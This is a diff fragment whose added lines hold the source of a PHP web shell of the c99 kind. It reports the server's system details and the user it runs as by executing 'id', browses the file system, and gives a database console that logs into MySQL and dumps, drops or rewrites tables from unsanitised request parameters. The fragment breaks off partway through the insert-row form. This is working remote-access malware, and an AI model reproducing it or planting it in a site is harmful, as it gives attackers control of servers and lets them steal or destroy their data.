+      <font color="#333333">ngw4ck1ngw4c</font><font color="white">k1ngw4ck1ng</font><font color="#333333">w4</font><font color="white">ck1n</font><font color="#333333">gw4ck1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1ngw4ck1n</font><font color="#333333">gw4ck1n</font><font color="white">gw4ck1ngw4ck</font><font color="#333333">1ngw4ck1ng</font><font color="white">w4ck1</font><font color="#333333">ngw4ck1</font><font color="white">ngw4ck1ngw4ck1ng</font><font color="#333333">w4ck1ng</font><font color="white">w4ck1n</font><font color="#333333">gw4ck1ngw4</font><br>
+
+      <font color="#333333">ck1ngw4ck1ng</font><font color="white">w4ck1ngw</font><font color="#333333">4c</font><font color="white">k1ngw4c</font><font color="#333333">k1ng</font><font color="white">w4ck1ngw4c</font><font color="#333333">k1n</font><font color="white">gw4c</font><font color="#333333">k1ngw4c</font><font color="white">k1ngw4ck1ngw4ck</font><font color="#333333">1ngw4c</font><font color="white">k1</font><font color="#333333">n</font><font color="white">gw4</font><font color="#333333">ck1ngw4</font><font color="white">ck1ngw4ck1ngw4ck1ngw4ck1ngw</font><font color="#333333">4ck1ngw4ck1n</font><br>
+
+      <font color="#333333">gw4ck1ngw4ck1</font><font color="white">ngw4ck</font><font color="#333333">1ngw</font><font color="white">4ck1ng</font><font color="#333333">w4c</font><font color="white">k1ngw</font><font color="#333333">4</font><font color="white">ck1n</font><font color="#333333">gw4c</font><font color="white">k1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1ngw4ck1ngw4ck1</font><font color="#333333">ngw4ck</font><font color="white">1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4</font><font color="#333333">c</font><font color="white">k1ngw4</font><font color="#333333">ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw4</font><font color="white">ck1</font><font color="#333333">ngw4ck1ngw4c</font><br>
+
+      <font color="#333333">k1ngw4ck1ngw4c</font><font color="white">k1ngw</font><font color="#333333">4ck1n</font><font color="white">gw4ck</font><font color="#333333">1ngw4ck1n</font><font color="white">gw4c</font><font color="#333333">k1ngw</font><font color="white">4ck1ngw4ck1n</font><font color="#333333">g</font><font color="white">w4ck1</font><font color="#333333">ngw4</font><font color="white">ck1ngw4ck</font><font color="#333333">1ngw</font><font color="white">4ck</font><font color="#333333">1ngw4c</font><font color="white">k1n</font><font color="#333333">gw</font><font color="white">4ck1</font><font color="#333333">ngw4ck1n</font><font color="white">g</font><font color="#333333">w4ck1n</font><font color="white">gw4c</font><font color="#333333">k1ngw4ck1ng</font><br>
+
+      <font color="#333333">w4ck1ngw4ck1ngw4</font><font color="white">ck1</font><font color="#333333">ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck1ngw4</font><font color="white">ck1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1ngw</font><font color="#333333">4ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw4ck</font><font color="white">1ngw4ck1ngw4c</font><font color="#333333">k1n</font><font color="white">gw4</font><font color="#333333">ck1n</font><font color="white">gw4</font><font color="#333333">ck1ngw4ck1ngw</font><font color="white">4ck1ng</font><font color="#333333">w4ck1ngw4ck</font><br>
+
+      <font color="#333333">1ngw4ck1ngw4ck1ngw4ck1ngw4</font><font color="white">c</font><font color="#333333">k1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1ngw4ck1ngw4ck1ngw4ck1n</font><font color="white">g</font><font color="#333333">w4ck1ngw4c</font><font color="white">k1ngw4</font><font color="#333333">c</font><font color="white">k</font><font color="#333333">1ngw4c</font><font color="white">k1n</font><font color="#333333">gw4c</font><font color="white">k1n</font><font color="#333333">gw4ck1ngw4ck1ngw</font><font color="white">4ck1n</font><font color="#333333">gw4ck1ngw</font><br>
+
+      <font color="#333333">4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ng</font><font color="white">w4</font><font color="#333333">ck1ngw4ck1ngw4ck1n</font><font color="white">gw4ck</font><font color="#333333">1ngw4ck1</font><br>
+      <font color="#333333">ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4ck1ngw4ck1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1ngw4</font></br>
+  </span>&nbsp;</p></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>System Info:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><? echo "<b>Disabled functions</b>: <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} ?><p align="left"><b>We are: <?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?><?php $curl_on = @function_exists('curl_version');
+echo "<br/>cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>")); ?></br><? if(@ini_get("register_globals")){$reg_g="<font color=green>ON</font>";}else{$reg_g="<font color=red>OFF</font>";} echo("<b>Register globals:</b> $reg_g"); ?><?php echo "<br/>MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; }
+echo "</b>";
+echo "<br/>MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?><?php echo "<br/>PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?><?php echo "<br/>Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?> </b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+$d = str_replace("\\\\","\\",$d);
+$dispd = htmlspecialchars($d);
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
+$i = 0;
+foreach($pd as $b)
+{
+ $t = "";
+ $j = 0;
+ foreach ($e as $r)
+ {
+  $t.= $r.DIRECTORY_SEPARATOR;
+  if ($j == $i) {break;}
+  $j++;
+ }
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
+ $i++;
+}
+echo "&nbsp;&nbsp;&nbsp;";
+if (is_writable($d))
+{
+ $wd = TRUE;
+ $wdt = "<font color=green>[ ok ]</font>";
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
+}
+else
+{
+ $wd = FALSE;
+ $wdt = "<font color=red>[ Read-Only ]</font>";
+ echo "<b>".view_perms_color($d)."</b>";
+}
+if (is_callable("disk_free_space"))
+{
+ $free = disk_free_space($d);
+ $total = disk_total_space($d);
+ if ($free === FALSE) {$free = 0;}
+ if ($total === FALSE) {$total = 0;}
+ if ($free < 0) {$free = 0;}
+ if ($total < 0) {$total = 0;}
+ $used = $total-$free;
+ $free_percent = round(100/($total/$free),2);
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
+
+}
+echo "<br>";
+echo "<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
+$letters = "";
+if ($win)
+{
+ $v = explode("\\",$d);
+ $v = $v[0];
+ foreach (range("a","z") as $letter)
+ {
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes);
+  if (!$bool) {$bool = is_dir($letter.":\\");}
+  if ($bool)
+  {
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ ";
+   if ($letter.":" != $v) {$letters .= $letter;}
+   else {$letters .= "<font color=green>".$letter."</font>";}
+   $letters .= " ]</a> ";
+  }
+ }
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
+}
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%sort",$sort,$item[1]);
+  $v = realpath($d."..");
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]);
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+echo "</p></td></tr></table><br>";
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $surl."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_smarterror();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
+ }
+ else {$sql_sock = FALSE;}
+ echo "<b>SQL Manager:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "NO CONNECTION";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl));
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql");
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"><br/></font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
+ else
+ {
+  //Start left panel
+  if (!empty($sql_db))
+  {
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."w4/act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_tables($sql_db);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+    $c = 0;
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
+    if (!$c) {echo "No tables found in database.";}
+   }
+  }
+  else
+  {
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+   $result = mysql_list_dbs($sql_sock);
+   if (!$result) {echo mysql_smarterror();}
+   else
+   {
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+    $c = 0;
+    $dbs = "";
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
+    echo "<option value=\"\">Databases (".$c.")</option>";
+    echo $dbs;
+   }
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  //End left panel
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  //Start center panel
+  $diplay = TRUE;
+  if ($sql_db)
+  {
+   if (!is_numeric($c)) {$c = 0;}
+   if ($c == 0) {$c = "no";}
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
+   echo "</b></center>";
+   $acts = array("","dump");
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
+   elseif ($sql_tbl_act == "insert")
+   {
+    if ($sql_tbl_insert_radio == 1)
+    {
+     $keys = "";
+     $akeys = array_keys($sql_tbl_insert);
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
+     $values = "";
+     $i = 0;
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+    elseif ($sql_tbl_insert_radio == 2)
+    {
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
+     $result = mysql_query($sql_query) or print(mysql_smarterror());
+     $result = mysql_fetch_array($result, MYSQL_ASSOC);
+     $sql_act = "query";
+     $sql_tbl_act = "browse";
+    }
+   }
+   if ($sql_act == "query")
+   {
+    echo "<hr size=\"1\" noshade>";
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
+   }
+   if (in_array($sql_act,$acts))
+   {
+    ?><table border="0" width="100%" height="1"><tr>
+    <td width="30%" height="1"><b>Create a new table:</b>
+      <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td>
+    
+    <td width="30%" height="1"><b>Dump DataBase:</b>
+      <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+    if ($sql_act == "newtbl")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+    }
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+   }
+   elseif ($sql_act == "dump")
+   {
+    if (empty($submit))
+    {
+     $diplay = FALSE;
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
+     $v = join (";",$dmptbls);
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
+     if ($dump_file) {$tmp = $dump_file;}
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
+     echo "</form>";
+    }
+    else
+    {
+     $diplay = TRUE;
+     $set = array();
+     $set["sock"] = $sql_sock;
+     $set["db"] = $sql_db;
+     $dump_out = "download";
+     $set["print"] = 0;
+     $set["nl2br"] = 0;
+     $set[""] = 0;
+     $set["file"] = $dump_file;
+     $set["add_drop"] = TRUE;
+     $set["onlytabs"] = array();
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
+     $ret = mysql_dump($set);
+     if ($sql_dump_download)
+     {
+      @ob_clean();
+      header("Content-type: application/octet-stream");
+      header("Content-length: ".strlen($ret));
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
+      echo $ret;
+      exit;
+     }
+     elseif ($sql_dump_savetofile)
+     {
+      $fp = fopen($sql_dump_file,"w");
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
+      else
+      {
+       fwrite($fp,$ret);
+       fclose($fp);
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
+      }
+     }
+     else {echo "<b>Dump: nothing to do!</b>";}
+    }
+   }
+   if ($diplay)
+   {
+    if (!empty($sql_tbl))
+    {
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
+     $count_row = mysql_fetch_array($count);
+     mysql_free_result($count);
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
+     $tbl_struct_fields = array();
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+     if (!is_numeric($perpage)) {$perpage = 10;}
+     $numpages = $count_row[0]/$perpage;
+     $e = explode(" ",$sql_order);
+     if (count($e) == 2)
+     {
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+      else {$asc_desc = "ASC";}
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+     }
+     else {$v = "";}
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+     $result = mysql_query($query) or print(mysql_smarterror());
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+     if ($sql_tbl_act == "insert")
+     {
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+      if (!empty($sql_tbl_insert_radio))
+      {
+
+      }
+      else
+      {
+       echo "<br><br><b>Inserting row into table:</b><br>";
+       if (!empty($sql_tbl_insert_q))
+       {
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+        $sql_query .= " LIMIT 1;";
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+        $values = mysql_fetch_assoc($result);
+        mysql_free_result($result);
+       }
+       else {$values = array();}
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+       foreach ($tbl_struct_fields as $field)
+       {
+        $name = $field["Field"];
+        if (empty($sql_tbl_insert_q)) {$v = "";}
